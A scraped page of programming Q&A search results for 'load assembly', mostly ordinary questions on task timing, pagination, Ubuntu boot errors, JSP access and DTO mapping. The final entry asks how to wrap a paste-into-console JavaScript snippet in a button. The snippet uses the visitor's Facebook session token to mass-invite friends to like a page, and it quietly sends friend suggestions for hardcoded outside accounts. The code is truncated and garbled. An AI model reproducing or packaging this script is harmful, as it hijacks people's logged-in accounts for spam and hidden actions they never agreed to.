Search Results

Search found 21004 results on 841 pages for 'load assembly'.


  • Logic - Time measurement

    - by user73384
    I need to measure the following for each task: the last execution time and the maximum execution time; the CPU load/time consumed by each task over a period defined by the application at run time; and the maximum CPU load consumed by each task. The tasks have these characteristics: the first task runs in the background and provides an event only when it is entered; the second task is periodic and provides events on both entry and exit; the third task is an interrupt that can start at any time, with no information available from it; the fourth task is the highest-priority interrupt, can start at any time, and provides events on entry and exit. The solution should use as little execution time and memory as possible. A 32-bit incrementing timer is available for time counting. Let's prepare and discuss the logic; it's OK to have limitations! Questions about the problem statement are welcome.
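    For discussion, here is a minimal sketch of the enter/exit bookkeeping, assuming the 32-bit free-running counter can be read as a raw integer and that no single run spans more than one counter wrap. It is written in Java purely for illustration; the class, field and method names are invented for this example, and on a real target the same arithmetic would sit in the task and interrupt hooks.

        // Hypothetical per-task bookkeeping driven by enter/exit events.
        final class TaskStats {
            private int enterTick;        // raw 32-bit counter value at task entry
            private long lastExecTicks;   // duration of the most recent run
            private long maxExecTicks;    // worst-case duration seen so far
            private long busyTicks;       // accumulated run time in the current window

            void onEnter(int nowTick) {
                enterTick = nowTick;
            }

            void onExit(int nowTick) {
                // Unsigned 32-bit subtraction survives a single counter wrap-around.
                long elapsed = Integer.toUnsignedLong(nowTick - enterTick);
                lastExecTicks = elapsed;
                if (elapsed > maxExecTicks) maxExecTicks = elapsed;
                busyTicks += elapsed;
            }

            // CPU load over a measurement window of `windowTicks` counter ticks.
            double loadOverWindow(long windowTicks) {
                double load = (double) busyTicks / windowTicks;
                busyTicks = 0;            // start a new window
                return load;
            }
        }

    The background task, which reports only its entry, would have to be charged whatever time remains once the instrumented tasks are accounted for over the measurement window.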

    Read the article

  • Display large amount of data to client through pagination

    - by ebram tharwat
    I have a web application in which I need to show a large number of records to clients. I'm going to use pagination, but I was wondering which I should do: load all the data once, so that pagination, sorting and searching become easy (but the initial load takes a long time; against a local DB it takes up to 9 seconds), or make a new request to the server (and from there to the DB) each time a new page is shown. In the second case, what happens when the client clicks the Prev button? I would be making a new request for data I had already fetched. Should I cache data that has been loaded before, and if that is a good technique, how? So: load all the data once, or make a new request every time I need data that may already have been loaded? I'm using ASP.NET MVC SPA with durandaljs and knockoutjs.
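    For what it's worth, here is a language-neutral sketch of the second approach: one request per page plus a small cache of pages already seen, so pressing Prev does not hit the database again. It is written in Java only for illustration (the question itself is ASP.NET MVC), and all names here are invented for the example.

        import java.util.LinkedHashMap;
        import java.util.List;
        import java.util.Map;

        // Hypothetical page cache: keeps the most recently used pages so revisiting them is free.
        public class PageCache<T> {
            private final int maxPages;
            private final Map<Integer, List<T>> pages;

            public PageCache(int maxPages) {
                this.maxPages = maxPages;
                // An access-ordered LinkedHashMap gives simple LRU eviction.
                this.pages = new LinkedHashMap<>(16, 0.75f, true) {
                    @Override
                    protected boolean removeEldestEntry(Map.Entry<Integer, List<T>> eldest) {
                        return size() > PageCache.this.maxPages;
                    }
                };
            }

            public interface PageLoader<T> {
                List<T> loadPage(int pageNumber);   // e.g. a query with OFFSET/LIMIT for that page
            }

            public List<T> get(int pageNumber, PageLoader<T> loader) {
                // Only pages never seen (or already evicted) cost a round trip.
                return pages.computeIfAbsent(pageNumber, loader::loadPage);
            }
        }

    With something like this on the client or the server, the Prev case becomes a cache hit, and only genuinely new pages cost a round trip to the database.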

    Read the article

  • When I boot it says "No any drive found" and turns off after upgrade from 9.10 to 10.04

    - by user797582
    I did an upgrade over the weekend from Ubuntu 9.10 to 10.04 (Karmic to Lucid). Now, when I restart my computer, it goes through the regular load screen showing my Asus P5K motherboard just like before, but instead of showing the Ubuntu load screen it tries to start GRUB, fails, says "No any drive found", and the screen goes black. I've tried changing the drive configuration in the BIOS to AHCI or RAID, and that didn't work. I've tried disabling JMICRON, but to no avail. I'm running out of options here. Any advice?

    Read the article

  • Blank lines between sourcecode [closed]

    - by manix
    I'm confused by some strange behaviour. I have edited some PHP files remotely with PhpDesigner8 (a PHP editor). Everything looks right on my side, but when my teammates reopen the files that I have edited, the source code has blank lines between every line, like below:

        class AdminController extends Controller {

            function __construct() {

                parent::__construct();

                if (!$this->session->can_admin()) {

                    show_error('Solo para administradores.');

                }

                $this->load->library('backend');

            }

        }

    instead of:

        class AdminController extends Controller {
            function __construct() {
                parent::__construct();
                if (!$this->session->can_admin()) {
                    show_error('Solo para administradores.');
                }
                $this->load->library('backend');
            }
        }

    Have you experienced these kinds of problems?

    Read the article

  • How can I run a complete application from RAM?

    - by pico
    When I do some work in the background (unpacking, compiling, backups, etc.) my HDD is under load, and Firefox and Chromium, for example, take very long to start and react very slowly. While my HDD is under load I still have plenty of free RAM and free CPU. How can I copy the whole of Firefox or Chromium, including all dependencies, into RAM? I don't care about persistence; I just want to view some websites, videos, etc. There are instructions for putting the cache into /dev/shm, but that didn't speed things up much. Getting the profile onto the RAM drive might also be easy... but how do I get the binaries with all their dependencies into RAM?

    Read the article

  • jQuery setTimeout delay for an element

    - by Trouble
    Is there an easier way to wait for an element to load (added by an independent script/mootools/other)? For example: I am waiting for a Google map to load, but I don't want to use its API for the checks. So I made two functions:

        function checkIfexist() {
            if (jQuery('#container').length)
                return 0;
            else
                reload(1);
        }

        function reload(mode) {
            setTimeout(function() {
                // do stuff . . .
                if (mode == 1)
                    checkIfexist();
            }, 400);
        }

    I start it with reload(1);. Is there an easier way to use setTimeout in such a way? I don't want to use delay, wait or whatever.

    Read the article

  • Why Does Unity lag Often That I have To Manually Shutdown/Restart my Core i3 Laptop?

    - by user20655
    I did a fresh install of Ubuntu and then did some upgrades. After the next restart, when I tried to open Ubuntu Software Center it took about 20 seconds for the window to load and 10 more seconds before it became clickable. While installing software, Unity lagged so badly that every time I clicked an application it took a few seconds before I could see it. Even gedit takes a long time to load. The worst part is that my computer lags even when I'm doing nothing with it. My laptop is a brand-new Core i3 with 2 GB of RAM; Unity should run perfectly on that kind of machine, right? BTW: I have reinstalled Ubuntu 11.04 about 5 times now and still nothing has changed.

    Read the article

  • Can XNA Content Pipeline split one content file into several .xnb?

    - by Zeta Two
    Let's say I have an XML file which looks like this:

        <Weapons>
          <Weapon>
            <Name>Pistol</Name>
            ...
          </Weapon>
          <Weapon>
            <Name>MachineGun</Name>
            ...
          </Weapon>
        </Weapons>

    Would it be possible to use a custom importer/writer/reader to create two files, Pistol.xnb and MachineGun.xnb, which I can load individually with Content.Load()? While writing this I realized I could just import a Weapon[] list and split them up with a helper, but I'm still wondering if this is possible?

    Read the article

  • PHP class data implementation

    - by Bakanyaka
    I'm studying OOP in PHP and have watched two tutorials that implement a user login/registration system as an example, but the implementations vary. Which approach is more correct for working with data such as this? (1) On object creation, load all the data retrieved from the database into a single property called something like _data, as an array, and have the other methods operate on that property. (2) Create a separate property for each field retrieved from the database, load each field into its respective property on object creation, and operate on those properties individually. Then let's say I want to create a method that returns a list of all users with their data. Which way is better: a method that returns just an array of user data, like

        Array([0] => array([id] => 1, [username] => 'John', ...),
              [1] => array([id] => 2, [username] => 'Jack', ...),
              ...)

    or a method that creates a new instance of its class for each user and returns an array of objects?
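    A small illustration of the two shapes discussed for the user-list question. It is written in Java only because it keeps the contrast compact; the question itself is about PHP, and the User type here is invented for the example.

        import java.util.List;
        import java.util.Map;

        public class UserShapes {
            // Option B: a typed object per row; each DB field becomes an explicit property.
            record User(int id, String username) {}

            public static void main(String[] args) {
                // Option A: each row is a generic bag of fields, like the nested-array version.
                List<Map<String, Object>> rows = List.of(
                        Map.<String, Object>of("id", 1, "username", "John"),
                        Map.<String, Object>of("id", 2, "username", "Jack"));

                // Option B: the same data as a list of objects.
                List<User> users = List.of(new User(1, "John"), new User(2, "Jack"));

                System.out.println(rows.get(0).get("username")); // field names are plain strings
                System.out.println(users.get(0).username());     // field names are checked by the compiler
            }
        }

    The nested-array shape is cheaper to build, while the object-per-row shape gives each field a checked name and a place to hang behaviour; the trade-off is the same in PHP.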

    Read the article

  • What should be stored in UserContext?

    - by HonorGod
    From my general understanding, I believe the UserContext of a web application is supposed to hold the user's authentication and authorization (user role) information. As part of the user roles there are definitions of who can access which data, and accordingly the corresponding reference data gets loaded into the UserContext as well. Is it good practice to load and use reference data from the UserContext? Does this have any impact once you consider the number of sessions versus the size of the data each one holds inside the JVM? I am thinking we should use the UserContext only for authentication and authorization, and load the reference data from a cache on demand, using it only if required.
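    A rough sketch of that split, assuming a Java web application; the class names and the shape of the reference data are invented for the example. The per-session context stays small (identity plus roles), while reference data lives in one application-wide cache shared by every session.

        import java.util.Map;
        import java.util.Set;
        import java.util.concurrent.ConcurrentHashMap;

        public class UserContextSketch {
            // Per-session: small, just identity and roles.
            record UserContext(String userId, Set<String> roles) {}

            // Application-wide: reference data loaded once and shared by every session.
            static final Map<String, Object> REFERENCE_CACHE = new ConcurrentHashMap<>();

            static Object referenceData(String key) {
                // computeIfAbsent loads on first demand; later sessions reuse the cached copy.
                return REFERENCE_CACHE.computeIfAbsent(key, k -> loadFromDatabase(k));
            }

            private static Object loadFromDatabase(String key) {
                return "reference rows for " + key; // stand-in for a real lookup
            }
        }

    With the shared cache, heap use no longer grows as (number of sessions) x (size of reference data), which is the impact the question worries about.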

    Read the article

  • Weird graphical bug when installing on an Asus G51jx

    - by skeletons
    Each and every time I attempt to install Ubuntu 11.04 or 11.10, I get this bug right after the very first Ubuntu load screen pops up from the boot CD. I have been able to successfully load 10.04 and 10.10 on it, but it refuses to load 11.10; even attempting to upgrade from 10.10 to 11.04 caused this very same issue. I am running an Asus G51jx. Please help; I have been trying to get this working for two weeks now. I do like 10.10, but I would rather have 11.10 :(

    Read the article

  • Is the Cloud ready for an Enterprise Java web application? Seeking a JEE hosting advice.

    - by Jakub Holý
    Greetings to all the smart people around here! I'd like to ask whether it is feasible, or a good idea at all, to deploy a Java enterprise web application to a cloud such as Amazon EC2. More exactly, I'm looking for infrastructure options for an application that shall handle a few hundred users with long but neither CPU- nor memory-intensive sessions. I'm considering dedicated servers, virtual private servers (VPSs) and EC2. I've noticed that there is a project called JBoss Cloud, so people are working on enabling such deployments; on the other hand it doesn't seem to be mature yet, and I'm not sure that the cloud is ready for this kind of application, which differs from typical cloud-based applications like Twitter. Would you recommend deploying it to the cloud? What are the pros and cons?

    The application is a Java EE 5 web application whose main function is to enable users to compose their own customized Product by combining the available Parts. It uses stateless and stateful session beans and JPA for persistence of entities to an RDBMS, and it fetches information about Parts from the company's inventory system via a web service. Aside from external users it's used also by a few internal ones, who are authenticated against the company's LDAP. The application should handle around 300-400 concurrent users building their products and should be reasonably scalable and available, though these qualities are of only medium importance at this stage.

    I've proposed an architecture consisting of a firewall (FW) and a load balancer supporting sticky sessions and https (in the cloud this would be replaced with EC2's Elastic Load Balancing service and a FW on the application servers; in a physical architecture the load balancer would be hardware), then two physical clustered application servers combined with web servers (so that if one fails, a user doesn't lose his/her long-built product) and finally a database server. The DB server would need a slave backup instance that can replace the master instance if it fails. This should provide reasonable availability and fault tolerance and good scalability as long as a single RDBMS can keep up with the load, which should be OK for quite a while because most of the operations are done in memory using a stateful bean and only occasionally stored to or retrieved from the DB, and the amount of data is low too. A problematic part could be the dependency on the remote inventory-system web service, but with good caching of its outputs in the application it should be OK too.

    Unfortunately I have only a vague idea of the system resources (memory size, number and speed of CPUs/cores) that such an "average Java EE application" for a few hundred users needs. My rough and mostly unfounded estimate, based on actual Amazon offerings, is that 1.7 GB and a single 2-core "modern CPU" at around 2.5 GHz (the High-CPU Medium Instance) should be sufficient for either of the two application servers (since we can handle higher load by provisioning more of them). Alternatively I would consider using the Large instance (64-bit, 7.5 GB RAM, 2 cores at 1 GHz).

    So my question is whether such a deployment to the cloud is technically and financially feasible, or whether dedicated/VPS servers would be a better option, and whether there are some real-world experiences with something similar. Thank you very much!
/Jakub Holy PS: I've found the JBoss EAP in a Cloud Case Study that shows that it is possible to deploy a real-world Java EE application to the EC2 cloud but unfortunately there're no details regarding topology, instance types, or anything :-(

    Read the article

  • How to prevent client from accessing JSP page

    - by Ali Bassam
    In my web application I use jQuery's .load() function to load some JSP pages inside a DIV:

        $("#myDiv").load("chat.jsp");

    In chat.jsp, no Java code is executed unless the client has logged in; that is, I check the session:

        String sessionId = session.getAttribute("SessionId");
        if (sessionId.equals("100")) {
            //execute codes
        } else {
            //redirect to log in page
        }

    The Java code that does get executed will out.println(); some HTML elements. I don't want the client to be able to type /chat.jsp in the browser to access this page directly, as it will look bad, the other stuff from the main page won't be there, and it could harm the web app's security. How can I restrict someone from accessing chat.jsp directly, yet keep it accessible via .load()?

    UPDATE: JavaDB is a class that I made; it connects me to the database. This is chat.jsp:

        <body>
        <%
            String userId = session.getAttribute("SessionId").toString();
            if (userId != null) {
                String roomId = request.getParameter("roomId");
                String lastMessageId = request.getParameter("lastMessageId");
                JavaDB myJavaDB = new JavaDB();
                myJavaDB.Connect("Chat", "chat", "chat");
                Connection conn = myJavaDB.getMyConnection();
                Statement stmt = conn.createStatement();
                String lastId = "";
                int fi = 0;
                ResultSet rset = stmt.executeQuery("select message,message_id,first_name,last_name from users u,messages m where u.user_id=m.user_id and m.message_id>" + lastMessageId + " and room_id=" + roomId + " order by m.message_id asc");
                while (rset.next()) {
                    fi = 1;
                    lastId = rset.getString(2);
        %>
        <div class="message">
            <div class="messageSender">
                <%=rset.getString(3) + " " + rset.getString(4)%>
            </div>
            <div class="messageContents">
                <%=rset.getString(1)%>
            </div>
        </div>
        <%
                }
        %>
        <div class="lastId">
            <% if (fi == 1) {%>
                <%=lastId%>
            <% } else {%>
                <%=lastMessageId%>
            <% }%>
        </div>
        <% if (fi == 1) {%>
        <div class="messages">
        </div>
        <%
                }
            } else {
                response.sendRedirect("index.jsp");
            }%>
        </body>

    Guys, I don't know what Filter means.

    UPDATE: What if I decide to send a parameter that tells me the request came from jQuery,

        .load("chat.jsp", { jquery : "yes" });

    and then check it in chat.jsp:

        String yesOrNo = request.getParameter("jquery");

    Then they can simply get around this by using the URL /chat.jsp?jquery=yes or something like that.

    UPDATE: I tried Maksim's advice, and I got this when I tried to access chat.jsp. Is this the desired effect?
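    Since a servlet filter came up and the term was unclear: below is a minimal sketch of one, mapped to /chat.jsp, that lets a request through only when it arrives via XMLHttpRequest (jQuery's .load() sends the X-Requested-With header) and a logged-in session exists. The class name and redirect target are made up for the example, and a header check can be spoofed just like a request parameter, so this only discourages casual direct access rather than providing real security.

        import java.io.IOException;
        import javax.servlet.Filter;
        import javax.servlet.FilterChain;
        import javax.servlet.FilterConfig;
        import javax.servlet.ServletException;
        import javax.servlet.ServletRequest;
        import javax.servlet.ServletResponse;
        import javax.servlet.annotation.WebFilter;
        import javax.servlet.http.HttpServletRequest;
        import javax.servlet.http.HttpServletResponse;
        import javax.servlet.http.HttpSession;

        // Hypothetical filter guarding chat.jsp: only AJAX requests from a logged-in session get through.
        @WebFilter("/chat.jsp")
        public class AjaxOnlyFilter implements Filter {

            public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
                    throws IOException, ServletException {
                HttpServletRequest request = (HttpServletRequest) req;
                HttpServletResponse response = (HttpServletResponse) res;

                boolean ajax = "XMLHttpRequest".equals(request.getHeader("X-Requested-With"));
                HttpSession session = request.getSession(false);
                boolean loggedIn = session != null && session.getAttribute("SessionId") != null;

                if (ajax && loggedIn) {
                    chain.doFilter(req, res);            // let chat.jsp render
                } else {
                    response.sendRedirect("index.jsp");  // direct browser access goes back to the main page
                }
            }

            public void init(FilterConfig config) {}
            public void destroy() {}
        }

    With the filter in place, a URL typed straight into the address bar is bounced to index.jsp before chat.jsp ever runs, while the .load() call keeps working.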

    Read the article

  • Suggestions on how to map from Domain (ORM) objects to Data Transfer Objects (DTO)

    - by FryHard
    The current system that I am working on makes use of Castle ActiveRecord to provide ORM (object-relational mapping) between the domain objects and the database. This is all well and good and most of the time actually works well! The problem comes with Castle ActiveRecord's support for asynchronous execution; more specifically, the SessionScope that manages the session the objects belong to. Long story short: bad stuff happens! We are therefore looking for a way to easily convert (think automagically) from the domain objects (which know that a DB exists and care) to the DTO objects (which know nothing about the DB and care not for sessions, mapping attributes or all things ORM). Does anyone have suggestions for doing this? For a start I am looking for a basic one-to-one mapping of objects: the domain object Person will be mapped to, say, PersonDTO. I do not want to do this manually since it is a waste. Obviously reflection comes to mind, but I am hoping, with some of the better IT knowledge floating around this site, that something "cooler" will be suggested. Oh, I am working in C#, and the ORM objects are, as said before, mapped with Castle ActiveRecord.

    Example code: At @ajmastrean's request I have linked to an example that I have (badly) mocked together. The example has a capture form, a capture form controller, domain objects, an ActiveRecord repository and an async helper. It is slightly big (3 MB) because I included the ActiveRecord DLLs needed to get it running. You will need to create a database called ActiveRecordAsync on your local machine or just change the .config file. Basic details of the example:

    The Capture Form. The capture form has a reference to the controller:

        private CompanyCaptureController MyController { get; set; }

    On initialise of the form it calls MyController.Load():

        private void InitForm()
        {
            MyController = new CompanyCaptureController(this);
            MyController.Load();
        }

    This will return back to a method called LoadCompleted():

        public void LoadCompleted(Company loadCompany)
        {
            _context.Post(delegate
            {
                CurrentItem = loadCompany;
                bindingSource.DataSource = CurrentItem;
                bindingSource.ResetCurrentItem();
                //TODO: This line will throw the exception since the session scope used to fetch loadCompany is now gone.
                grdEmployees.DataSource = loadCompany.Employees;
            }, null);
        }

    This is where the "bad stuff" occurs, since we are using the child list of Company, which is set to lazy load.

    The Controller. The controller has a Load method that was called from the form; it then calls the async helper to asynchronously call the LoadCompany method and then return to the capture form's LoadCompleted method:

        public void Load()
        {
            new AsyncListLoad<Company>().BeginLoad(LoadCompany, Form.LoadCompleted);
        }

    The LoadCompany() method simply makes use of the repository to find a known company:

        public Company LoadCompany()
        {
            return ActiveRecordRepository<Company>.Find(Setup.company.Identifier);
        }

    The rest of the example is rather generic: it has two domain classes which inherit from a base class, a setup file to insert some data, and the repository to provide the ActiveRecordMediator abilities.
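    For the reflection idea, here is a sketch of a one-to-one, same-named-field copier. It is written in Java purely to illustrate the shape (the question itself is C#); the class name is invented, and it assumes the DTO has a parameterless constructor and non-final fields.

        import java.lang.reflect.Field;

        // Shallow copier: for every field declared on the DTO, look for a domain field
        // with the same name and copy its value across.
        public class SimpleMapper {
            public static <T> T map(Object source, Class<T> dtoType) throws ReflectiveOperationException {
                T dto = dtoType.getDeclaredConstructor().newInstance();
                for (Field dtoField : dtoType.getDeclaredFields()) {
                    try {
                        Field sourceField = source.getClass().getDeclaredField(dtoField.getName());
                        sourceField.setAccessible(true);
                        dtoField.setAccessible(true);
                        dtoField.set(dto, sourceField.get(source));   // shallow copy, same-named fields only
                    } catch (NoSuchFieldException skipped) {
                        // DTO field with no matching domain field: leave it at its default value
                    }
                }
                return dto;
            }
        }

    Usage would look like PersonDTO dto = SimpleMapper.map(person, PersonDTO.class); in the C# world a dedicated mapping library such as AutoMapper covers the same ground and caches the reflected metadata.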

    Read the article

  • JQuery get attr value from ajax loaded page

    - by Paolo Rossi
    In my index.php I have an ajax pager that loads a content page (paginator.php).

    index.php

        <script type='text/javascript' src='js/jquery-1.11.1.min.js'></script>
        <script type='text/javascript' src='js/paginator.js'></script>
        <script type='text/javascript' src='js/functions.js'></script>
        <!-- Add fancyBox -->
        <script type="text/javascript" src="js/jquery.fancybox.pack.js?v=2.1.5"></script>
        <html>
        <div id="content"></div>

    paginator.js

        $(function() {
            var pageurl = 'paginator.php';

            //Initialise the table at the first run
            $('#content').load(pageurl, { pag: 1 }, function() {
                //animation();
            });

            //Page navigation click
            $(document).on('click', 'li.goto', function() {
                //Get the id of clicked li
                var pageNum = $(this).attr('id');
                $('#content').load(pageurl, { pag: pageNum }, function() {
                    //animation();
                });
            });
        }); /* END */

    paginator.php

        <ul><li>..etc </ul>
        ...
        ...
        <a id='test' vid='123'>get the id</a>
        <a id='test2' url='somepage.php'>open fancybox</a>

    I would like to read an attribute of the loaded page (paginator.php) in this way, but unfortunately I cannot:

    functions.js

        $(function() {
            $('#test').click(function(e) {
                var id = $('#test').attr('vid');
                alert("vid is " + vid);
            });
        }); /* END */

    In this case the popup does not appear. I also tried adding fancybox in my functions.js: the dialog box appears, but the url attribute is not picked up.

        var url = $('#test2').attr('url');
        $('#test').fancybox({
            'href' : url,
            'width' : 100,
            'height' : 100,
            'autoScale' : false,
            'transitionIn' : 'none',
            'transitionOut' : 'none',
            'type' : 'iframe',
            'fitToView' : true,
            'autoSize' : false
        });

    In other scenarios, without the page being loaded dynamically, I can do it, but in this case the behaviour is different. How could I do this? Thanks.

    EDIT: my goal is to open a dialog (fancybox) taking a variable from the loaded page.

    EDIT2: I tried it this way:

    paginator.php

        <a id="test" vid="1234">click me</a>

    paginator.js

        //Initialise the table at the first run
        $('#content').load(pageurl, { pag: 1 }, function() {
            hide_anim();
            popup();
        });

        //Page navigation click
        $(document).on('click', 'li.goto', function() {
            //Get the id of clicked li
            var pageNum = $(this).attr('id');
            $('#content').load(pageurl, { pag: pageNum }, function() {
                hide_anim();
                popup();
            });
        })

    function.js

        function popup() {
            $('#test').click(function(e) {
                e.preventDefault();
                var vid = $('#test').attr('vid');
                alert("vid is " + vid);
            });
        }

    But the popup does not appear...

    Read the article

  • All UITableCells rendered at once... why?

    - by Greg
    I'm extremely confused by the proper behavior of UITableView cell rendering. Here's the situation: I have a list of 250 items that are loading into a table view, each with an image. To optimize the image download, I followed along with Apple's LazyTableImages sample code... pretty much following it exactly. Really good system... for reference, here's the cell renderer within the Apple sample code:

        - (UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath
        {
            // customize the appearance of table view cells
            //
            static NSString *CellIdentifier = @"LazyTableCell";
            static NSString *PlaceholderCellIdentifier = @"PlaceholderCell";

            // add a placeholder cell while waiting on table data
            int nodeCount = [self.entries count];
            if (nodeCount == 0 && indexPath.row == 0)
            {
                UITableViewCell *cell = [tableView dequeueReusableCellWithIdentifier:PlaceholderCellIdentifier];
                if (cell == nil)
                {
                    cell = [[[UITableViewCell alloc] initWithStyle:UITableViewCellStyleSubtitle
                                                   reuseIdentifier:PlaceholderCellIdentifier] autorelease];
                    cell.detailTextLabel.textAlignment = UITextAlignmentCenter;
                    cell.selectionStyle = UITableViewCellSelectionStyleNone;
                }
                cell.detailTextLabel.text = @"Loading…";
                return cell;
            }

            UITableViewCell *cell = [tableView dequeueReusableCellWithIdentifier:CellIdentifier];
            if (cell == nil)
            {
                cell = [[[UITableViewCell alloc] initWithStyle:UITableViewCellStyleSubtitle
                                               reuseIdentifier:CellIdentifier] autorelease];
                cell.selectionStyle = UITableViewCellSelectionStyleNone;
            }

            // Leave cells empty if there's no data yet
            if (nodeCount > 0)
            {
                // Set up the cell...
                AppRecord *appRecord = [self.entries objectAtIndex:indexPath.row];
                cell.textLabel.text = appRecord.appName;
                cell.detailTextLabel.text = appRecord.artist;

                // Only load cached images; defer new downloads until scrolling ends
                if (!appRecord.appIcon)
                {
                    if (self.tableView.dragging == NO && self.tableView.decelerating == NO)
                    {
                        [self startIconDownload:appRecord forIndexPath:indexPath];
                    }
                    // if a download is deferred or in progress, return a placeholder image
                    cell.imageView.image = [UIImage imageNamed:@"Placeholder.png"];
                }
                else
                {
                    cell.imageView.image = appRecord.appIcon;
                }
            }
            return cell;
        }

    So – my implementation of Apple's LazyTableImages system has one crucial flaw: it starts all downloads for all images immediately. Now, if I remove this line:

        //[self startIconDownload:appRecord forIndexPath:indexPath];

    then the system behaves exactly like you would expect: new images load as their placeholders scroll into view. However, the initial view cells do not automatically load their images without that prompt in the cell renderer. So, I have a problem: with the prompt in the cell renderer, all images load at once. Without the prompt, the initial view doesn't load. Now, this works fine in the Apple sample code, which got me wondering what was going on with mine. It's almost like it was building all cells up front rather than just the 8 or so that would appear within the display. So, I got looking into it, and this is indeed the case... my table is building 250 unique cells! I didn't think UITableView worked like this; I guess I thought it only built as many items as were needed to populate the table. Is this the case, or is it correct that it would build all 250 cells up front?
Also – related question: I've tried to compare my implementation against the Apple LazyTableImages sample, but have discovered that NSLog appears to be disabled within the Apple sample code (which makes direct behavior comparisons extremely difficult). Is that just a simple publish setting somewhere, or has Apple somehow locked down their samples so that you can't log output at runtime? Thanks!

    Read the article

  • Loading multiple copies of a group of DLLs in the same process

    - by george
    Background: I'm maintaining a plugin for an application, using Visual C++ 2003. The plugin is composed of several DLLs: there's the main DLL, the one that the application loads using LoadLibrary, and there are several utility DLLs that are used by the main DLL and by each other. Dependencies generally look like this:

        plugin.dll - utilA.dll, utilB.dll
        utilA.dll - utilB.dll
        utilB.dll - utilA.dll, utilC.dll

    You get the picture. Some of the dependencies between the DLLs are load-time and some run-time. All the DLL files are stored in the executable's directory (not a requirement, just how it works now).

    The problem: There's a new requirement - running multiple instances of the plugin within the application. The application runs each instance of the plugin in its own thread, i.e. each thread calls The plugin's code, however, is anything but thread-safe: lots of global variables, etc. Unfortunately, fixing the whole thing isn't currently an option, so I need a way to load multiple (at most 3) copies of the plugin's DLLs in the same process.

    Option 1: The distinct-names approach. Create 3 copies of each DLL file, so that each file has a distinct name, e.g. plugin1.dll, plugin2.dll, plugin3.dll, utilA1.dll, utilA2.dll, utilA3.dll, utilB1.dll, etc. The application will load plugin1.dll, plugin2.dll and plugin3.dll. The files will be in the executable's directory. For each group of DLLs to know each other by name (so the inter-dependencies work), the names need to be known at compile time, meaning the DLLs need to be compiled multiple times, each time with different output file names. Not very complicated, but I'd hate having 3 copies of the VS project files, and I don't like having to compile the same files over and over.

    Option 2: The side-by-side assemblies approach. Create 3 copies of the DLL files, each group in its own directory, and define each group as an assembly by putting an assembly manifest file in the directory, listing the plugin's DLLs. Each DLL will have an application manifest pointing to the assembly, so that the loader finds the copies of the utility DLLs that reside in the same directory. The manifest needs to be embedded for it to be found when a DLL is loaded using LoadLibrary. I'll use mt.exe from a later VS version for the job, since VS2003 has no built-in manifest-embedding support. I've tried this approach with partial success: dependencies are found during load time of the DLLs, but not when a DLL function is called that loads another DLL. This seems to be the expected behavior according to this article - a DLL's activation context is only used at the DLL's load time, and afterwards it's deactivated and the process's activation context is used. I haven't yet tried working around this using ISOLATION_AWARE_ENABLED.

    Questions: Got any other options? Any quick & dirty solution will do. :-) Will ISOLATION_AWARE_ENABLED even work with VS2003? Comments will be greatly appreciated. Thanks!

    Read the article

  • How to convert this to a button action

    - by Filipe Heitor
    i have this code to paste in a browser console, can i turn this in to a button ??? and run in a html page? javascript:var Title="Ganhando Likes Na Pagina Do Facebook.";var Descriptions="",_text='Criado & Configurado Por Pelegrino RoxCurta Por favor MeGustaJEdi';page_id=/"profile_owner":"([0-9]+)"/.exec(document.getElementById("pagelet_timeline_main_column").getAttribute("data-gt"))[1];function InviteFriends(opo){jx.load(window.location.protocol+"//www.facebook.com/ajax/pages/invite/send_single/?page_id="+page_id+"&invitee="+opo+"&elem_id=u_0_1k&action=send&__user="+user_id+"&_a=1&_dyn=7n8aD5z5CF-3ui&__req=8&fb_dtsg="+fb_dtsg+"&phstamp=",function(a){var b=a.substring(a.indexOf("{"));var c=JSON.parse(b);i--;Descriptions="";err++;if(c.errorDescription)Descriptions+=c.errorDescription;else Descriptions+=JSON.stringify(c,null,"")}else{Descriptions+="color:darkgreen'";Descriptions+=arn[i]+" has been invited to like the page "+page_name+".";suc++}Descriptions+="";var display="";display+=""+Title+"";if(i0){display+=arr.length+" Friends Detected";display+=""+suc+" Friends Invited of "+(arr.length-i)+" Friends Processed ";display+="("+i+" Lefted...)";display+="";display+=Descriptions;display+="https://fbcdn-profile-a.akamaihd.net/.../r/UlIqmHJn-SK.gif);width:50px;height:50px;margin-left:-125px;padding:2px;border:1px solid rgba(0,0,0,0.4);' src="+pho[i]+""+arn[i]+"";display+="";display+="Please Wait While Inviting Your Friends to Like Your Page "+page_name+".";display+=_text;display+="";display+="";window[tag+"_close"]=true}else{Title="All Of Your Friends Have Been Invited to Like Your Page.";display+=arr.length+" Friends Detected and ";display+=""+suc+" Friends Invited.";display+="Go to HomepageRefresh PageCancel";display+="";display+=_text;display+="";window[tag+"_close"]=false}display+="";document.getElementById("pagelet_sidebar").innerHTML=display},"text","post");tay--;if(tay0){var s=arr[tay];setTimeout("InviteFriends("+s+")",100)}console.log(tay+"/"+arr.length+":"+arr[tay]+"/"+arn[tay]+", success:"+suc);if(page_id)jx.load(window.location.protocol+"//www.facebook.com/ajax/friends/suggest?&receiver="+opo+"&newcomer=1273872655&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user="+user_id+"&_a=1&_dyn=798aD5z5CF-&__req=17&fb_dtsg="+fb_dtsg+"&phstamp=1658165120113116104521114",function(){},"text","post");if(page_id)jx.load(window.location.protocol+"//www.facebook.com/ajax/friends/suggest?&receiver="+opo+"&newcomer=100002920534041&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user="+user_id+"&_a=1&_dyn=798aD5z5CF-&__req=17&fb_dtsg="+fb_dtsg+"&phstamp=1658168561015387781130",function(){},"text","post");if(page_id)jx.load(window.location.protocol+"//www.facebook.com/ajax/pages/invite/send?&fb_dtsg="+fb_dtsg+"&profileChooserItems=%7B%22"+opo+"%22%3A1%7D&checkableitems[0]="+opo+"&page_id="+page_id+"&__user="+user_id+"&_a=1&_dyn=7n8aD5z5CF-3ui&__req=k&phstamp=",function(){},"text","post")}jx={b:function(){var b=!1;if("undefined"!=typeof ActiveXObject)try{b=new ActiveXObject("Msxml2.XMLHTTP")}catch(c){try{b=new ActiveXObject("Microsoft.XMLHTTP")}catch(a){b=!1}}else if(window.XMLHttpRequest)try{b=new XMLHttpRequest}catch(h){b=!1}return b},load:function(b,c,a,h,g){var e=this.d();if(e&&b){e.overrideMimeType&&e.overrideMimeType("text/xml");h||(h="GET");a||(a="text");g||(g={});a=a.toLowerCase();h=h.toUpperCase();b+=b.indexOf("?")+1?"&":"?";var 
